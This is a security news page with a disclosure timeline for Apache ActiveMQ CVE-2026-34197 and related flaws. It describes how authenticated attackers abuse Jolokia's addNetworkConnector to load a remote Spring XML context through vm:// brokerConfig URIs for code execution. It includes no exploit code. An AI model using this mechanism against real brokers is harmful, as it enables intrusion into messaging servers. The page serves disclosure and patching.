Apache ActiveMQ Jolokia MBean Flaw Enables Authenticated RCE
Apache disclosed CVE-2026-34197, an important-severity remote code execution flaw in Apache ActiveMQ Broker and Apache ActiveMQ Classic that lets authenticated users execute code through the Jolokia JMX-HTTP bridge exposed at /api/jolokia/. The default Jolokia access policy permits exec operations on ActiveMQ MBeans, allowing attackers to call methods such as BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String) with a crafted discovery URI.
The exploit abuses the VM transport brokerConfig parameter to load a remote Spring XML application context via ResourceXmlApplicationContext, and Spring may instantiate singleton beans before ActiveMQ validates the configuration, enabling arbitrary code execution in the broker JVM, including through methods like Runtime.exec(). Apache said the issue affects versions before 5.19.4 in the 5.x line and 6.0.0 through before 6.2.3 in the 6.x line, and recommends upgrading to 5.19.5 or 6.2.3; the vulnerability was reported by Naveen Sunkavally of Horizon3.ai.
Timeline
Apr 23, 2026
Apache discloses CVE-2026-41044 in ActiveMQ Jolokia DestinationView MBean
Apache disclosed CVE-2026-41044, an important-severity authenticated remote code execution flaw in Apache ActiveMQ, Apache ActiveMQ Broker, and Apache ActiveMQ All. The issue lets an authenticated attacker craft a malicious broker name through the admin console and abuse the DestinationView MBean exposed by Jolokia to load a remote Spring XML context; Apache said affected versions should be upgraded to 5.19.6 or 6.2.5.
Apr 23, 2026
Apache discloses CVE-2026-40466 as bypass of ActiveMQ Jolokia RCE fix
Apache disclosed CVE-2026-40466, an important-severity vulnerability that can bypass the CVE-2026-34197 fix in Apache ActiveMQ when the activemq-http module is present. The flaw lets an authenticated attacker use HTTP Discovery transport to reach a malicious endpoint that returns a VM URI and ultimately load a remote Spring XML context for code execution; Apache advised upgrading to versions 5.19.6 or 6.2.5.
Apr 21, 2026
Shadowserver says 6,400 exposed ActiveMQ servers remain vulnerable
Shadowserver reported that more than 6,400 internet-exposed Apache ActiveMQ servers were still vulnerable to CVE-2026-34197 amid ongoing exploitation. It said the largest concentrations of exposed systems were in Asia, North America, and Europe, highlighting the scale of potential exposure.
Apr 17, 2026
CISA orders federal agencies to patch ActiveMQ flaw by April 30
After adding CVE-2026-34197 to the KEV catalog, CISA directed Federal Civilian Executive Branch agencies to remediate the Apache ActiveMQ vulnerability under Binding Operational Directive 22-01. The deadline for federal agencies to apply fixes or mitigations was set for 2026-04-30.
Apr 17, 2026
CISA adds ActiveMQ CVE-2026-34197 to KEV amid active exploitation
CISA added CVE-2026-34197 to its Known Exploited Vulnerabilities catalog and warned that the Apache ActiveMQ flaw is being actively exploited in the wild. The update elevated the issue from a disclosed and analyzed vulnerability to one with confirmed real-world exploitation.
Apr 7, 2026
Horizon3.ai publishes exploit details for ActiveMQ Jolokia RCE
Horizon3.ai released technical analysis of CVE-2026-34197, explaining exploitation via Jolokia's addNetworkConnector(String) to load a remote Spring XML file through vm:// and brokerConfig URLs. The post also noted that on ActiveMQ 6.0.0 through 6.1.1, chaining with CVE-2024-32114 can make the flaw effectively unauthenticated, and provided defender monitoring guidance for suspicious vm:// and brokerConfig=xbean:http activity.
Apr 6, 2026
Apache publishes remediation guidance for affected ActiveMQ versions
Apache stated the issue affects versions before 5.19.4 in the 5.x line and versions from 6.0.0 before 6.2.3 in the 6.x line. It advised users to upgrade to versions 5.19.5 or 6.2.3 to remediate the vulnerability.
Apr 6, 2026
Apache discloses CVE-2026-34197 affecting ActiveMQ Broker and Classic
Apache disclosed an important-severity vulnerability, CVE-2026-34197, in Apache ActiveMQ Broker and Apache ActiveMQ Classic. The flaw allows authenticated users to achieve code execution via Jolokia JMX-HTTP operations such as BrokerService.addNetworkConnector(String) and addConnector(String).
Apr 6, 2026
Horizon3.ai researcher reports ActiveMQ Jolokia RCE to Apache
Apache said CVE-2026-34197 was reported by Naveen Sunkavally of Horizon3.ai. The report concerned an authenticated remote code execution path through Jolokia-exposed ActiveMQ MBeans.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Vulnerabilities
Threat Actors
Malware
Organizations
Affected Products
Sources
5 more from sources like scworld, cyber security news, security affairs, the hacker news and bleeping computer
Related Stories
Apache ActiveMQ Flaws Enable Path Traversal and TLS DoS
Apache disclosed two vulnerabilities affecting multiple **ActiveMQ** components, including Client, Broker, and bundled distributions. **CVE-2026-33227** is a low-severity pathname restriction flaw that lets an authenticated user manipulate a supplied `key` value to traverse the classpath in two cases: when creating a **STOMP** consumer and when browsing messages through the web console. Apache warned the issue could expose classpath resource loading and potentially be chained with another attack. The flaw affects the 5.x branch before **5.19.3** and the 6.x branch from **6.0.0** before **6.2.2**, but Apache said those initial fixes were incomplete on Windows because of path separator handling, and recommended upgrading instead to **5.19.4** or **6.2.3**. Apache also published **CVE-2026-39304**, an important denial-of-service flaw in ActiveMQ's **NIO SSL transports** caused by incorrect handling of **TLS 1.3 `KeyUpdate`** messages. A client can repeatedly trigger updates and exhaust broker memory in the SSL engine, causing out-of-memory crashes and service disruption. Apache added that related handshake handling is also broken for earlier TLS versions such as **TLS 1.2**, though those cases lead to hung connections rather than memory exhaustion. The DoS issue affects the 5.x branch before **5.19.4** and the 6.x branch from **6.0.0** before **6.2.4**; users are advised to upgrade to **5.19.5** or **6.2.4**.
3 weeks ago
Critical RCE Vulnerability in Apache ActiveMQ NMS AMQP Client
A critical remote code execution (RCE) vulnerability, identified as CVE-2025-54539, has been discovered in the Apache ActiveMQ NMS AMQP Client. This flaw is rated with a CVSS 3.1 score of 9.8, indicating its severe impact and ease of exploitation. The vulnerability arises from the deserialization of untrusted data within the NMS AMQP Client component, which can allow attackers to execute arbitrary code on the server. Security researchers have confirmed that successful exploitation of this vulnerability could lead to full server-side code execution, potentially granting attackers complete control over affected systems. The issue specifically affects deployments using the NMS AMQP Client, a component commonly integrated into enterprise messaging infrastructures. Organizations relying on Apache ActiveMQ for message brokering are at heightened risk if they utilize the vulnerable client library. The vulnerability can be exploited remotely, requiring no prior authentication, which significantly increases the attack surface and urgency for remediation. Security advisories recommend immediate patching or mitigation to prevent exploitation in the wild. The flaw was publicly disclosed on October 16, 2025, prompting rapid response from the Apache ActiveMQ development team and the broader security community. No reports of active exploitation have been confirmed at the time of disclosure, but the critical nature of the bug has led to widespread concern among enterprise users. Technical analysis indicates that the vulnerability stems from improper handling of serialized objects received over the AMQP protocol. Attackers can craft malicious payloads that, when processed by the vulnerable client, trigger arbitrary code execution. The Apache Software Foundation has released updated versions of the NMS AMQP Client to address the issue and urges all users to upgrade immediately. Security experts highlight the importance of reviewing all systems for the presence of the affected library and applying compensating controls where patching is not immediately feasible. The vulnerability underscores the ongoing risks associated with deserialization flaws in widely used open-source components. Organizations are advised to monitor for indicators of compromise and to review their application architectures for similar risks. The incident serves as a reminder of the critical need for secure coding practices and regular vulnerability management in enterprise environments.
1 months ago
Apache ActiveMQ and Artemis Flaws Enable Security Bypass and Multiple Attacks
German authorities issued advisories for **Apache ActiveMQ Artemis** and **Apache ActiveMQ Classic** components after disclosing vulnerabilities that affect the broker, client, and web interfaces. One advisory warns that a flaw in **Apache ActiveMQ Artemis** can allow attackers to **bypass security measures**, raising the risk of unauthorized access or actions within affected messaging environments. A separate advisory reports **multiple vulnerabilities** in **Apache ActiveMQ** across the **Client, Broker, and Web** components, indicating broader exposure for organizations using the messaging platform in enterprise integrations and application back ends. The notices identify the affected Apache messaging products as requiring prompt review and remediation to reduce the risk of compromise in systems that rely on ActiveMQ services.
1 weeks ago